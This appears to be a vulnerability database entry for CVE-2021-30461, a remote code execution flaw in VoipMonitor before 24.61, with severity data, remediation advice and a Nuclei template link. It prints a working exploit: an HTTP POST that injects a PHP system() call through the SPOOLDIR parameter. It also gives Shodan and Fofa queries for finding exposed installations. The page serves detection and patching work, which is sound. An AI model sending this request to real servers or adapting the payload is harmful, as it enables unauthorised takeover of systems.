🔙 목록으로 돌아가기

CVE-2021-30461: VoipMonitor <24.61 - Remote Code Execution

TitleVoipMonitor <24.61 - Remote Code Execution
Authorshifacyclewala,hackergautam
SeverityCritical
ImpactSuccessful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
RemediationUpgrade VoipMonitor to version 24.61 or later to mitigate this vulnerability.
CVSS Score9.8
EPSS Score0.92773
CVE IDCVE-2021-30461
CWE IDCWE-94
Shodan Queryhttp.title:"VoIPmonitor"http.title:"voipmonitor"
Fofa Querytitle="voipmonitor"
Tags cve2021 cve rce voipmonitor vkev vuln

🔍 Vulnerability Description

VoipMonitor prior to 24.61 is susceptible to remote code execution vulnerabilities because of its use of user supplied data via its web interface, allowing remote unauthenticated users to trigger a remote PHP code execution vulnerability.

🌐 HTTP Request

POST /index.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_2; en) AppleWebKit/525.18 (KHTML, like Gecko) Version/3.1.1 Safari/525.18
Connection: close
Content-Length: 43
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

SPOOLDIR=test".system(id)."&recheck=Recheck

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2021/CVE-2021-30461.yaml

🦈 Packet Capture: ⬇️ Download cve-2021-30461.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A